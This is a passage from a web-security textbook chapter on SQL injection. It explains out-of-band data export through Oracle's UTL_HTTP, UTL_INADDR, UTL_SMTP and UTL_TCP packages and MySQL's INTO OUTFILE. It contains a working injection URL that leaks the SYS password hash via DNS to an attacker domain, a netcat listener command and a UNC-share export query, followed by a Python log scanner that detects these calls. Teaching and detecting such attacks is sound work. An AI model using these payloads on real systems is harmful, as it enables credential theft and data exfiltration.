The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

Chapter 9: Injecting Code (page 275)




This URL causes UTL_HTTP to make a GET request for a URL containing the first username in the table all_users. The attacker can simply set up a netcat listener on wahh-attacker.com to receive the result:

C:\>nc -nLp 80
GET /SYS HTTP/1.1
Host: wahh-attacker.com
Connection: close

The UTL_INADDR package is designed to be used to resolve host names to IP addresses. It can be used to generate arbitrary DNS queries to a server controlled by the attacker. In many situations, this is more likely to succeed than the UTL_HTTP attack because DNS traffic is often allowed out through corporate firewalls even when HTTP traffic is restricted. The attacker can leverage this package to perform a lookup on a hostname of their choice, effectively retrieving arbitrary data by prepending it as a subdomain to a domain name that they control, for example:

https://wahh-app.com/employees.asp?EmpNo=7521'||UTL_INADDR.GET_HOST_NAME((SELECT%20PASSWORD%20FROM%20DBA_USERS%20WHERE%20USERNAME='SYS')||'.wahh-attacker.com')

This results in a DNS query to the wahh-attacker.com name server containing the SYS user's password hash:

DCB748A5BC5390F2.wahh-attacker.com

The UTL_SMTP package can be used to send emails. This facility can be used to retrieve large volumes of data captured from the database by sending this in outbound emails.

The UTL_TCP package can be used to open arbitrary TCP sockets to send and receive network data.
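As an added example (not from the book), here is a defender-side check for the out-of-band channels described above: it URL-decodes the request path from web access-log lines and flags calls to the UTL_HTTP, UTL_INADDR, UTL_SMTP and UTL_TCP packages, noting when a nested SELECT supplies the data being exported. The log lines, client addresses and the double-encoded variant of the UTL_INADDR request are constructed for this example.

```python
import re
from urllib.parse import unquote

# Oracle packages the text above describes as out-of-band channels,
# invoked as PACKAGE.FUNCTION( ... ) inside an injected expression.
OOB_PACKAGE_RE = re.compile(
    r"\bUTL_(HTTP|INADDR|SMTP|TCP)\s*\.\s*[A-Z_]+\s*\(", re.IGNORECASE)
# A SELECT nested inside the call argument marks the data-export shape.
NESTED_SELECT_RE = re.compile(r"\(\s*SELECT\b", re.IGNORECASE)
# Request line of an Apache/nginx combined-format access log.
LOG_LINE_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def normalise(raw: str) -> str:
    """Decode twice so a double-encoded payload is seen in plain form."""
    return unquote(unquote(raw))

def classify_request(path_and_query: str):
    """Return a verdict dict for an out-of-band package call, else None."""
    decoded = normalise(path_and_query)
    m = OOB_PACKAGE_RE.search(decoded)
    if not m:
        return None
    return {
        "package": "UTL_" + m.group(1).upper(),
        "nested_select": bool(NESTED_SELECT_RE.search(decoded)),
    }

def scan_access_log(text: str):
    """Return (client ip, package, nested_select) for each suspicious line."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE_RE.search(line)
        if not m:
            continue
        verdict = classify_request(m.group(1))
        if verdict:
            hits.append((line.split()[0], verdict["package"], verdict["nested_select"]))
    return hits

# Constructed sample log: a benign request, the UTL_INADDR request from the
# text above, the same request double-encoded, and a benign documentation path.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2022:10:00:01 +0000] "GET /employees.asp?EmpNo=7521 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2022:10:00:02 +0000] "GET /employees.asp?EmpNo=7521'||UTL_INADDR.GET_HOST_NAME((SELECT%20PASSWORD%20FROM%20DBA_USERS%20WHERE%20USERNAME='SYS')||'.wahh-attacker.com') HTTP/1.1" 500 0
10.0.0.9 - - [01/Jan/2022:10:00:03 +0000] "GET /employees.asp?EmpNo=7521%2527%257C%257CUTL_INADDR.GET_HOST_NAME%2528%2528SELECT%2520PASSWORD%2520FROM%2520DBA_USERS%2529%2529 HTTP/1.1" 500 0
10.0.0.5 - - [01/Jan/2022:10:00:04 +0000] "GET /docs/utl_http_notes.html HTTP/1.1" 200 2048
"""
```

Decoding only once would miss the third line, since the parenthesis is still `%28` after a single pass; `scan_access_log(SAMPLE_LOG)` reports the two requests from 10.0.0.9 and nothing for the documentation path.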

MySQL

The SELECT ... INTO OUTFILE command can be used to direct the output from an arbitrary query into a file. The specified filename may contain a UNC path, enabling you to direct the output to a file on your own computer. For example:

select * into outfile '\\\\attacker\\share\\output.txt' from users;

To receive the file, you will need to create an SMB share on your computer that allows anonymous write access. You can configure shares on both Windows and Unix-based platforms to behave in this way. If you have difficulty receiving the exported file, this may well result from a configuration issue in your SMB server. You can use a sniffer to confirm whether the target server is



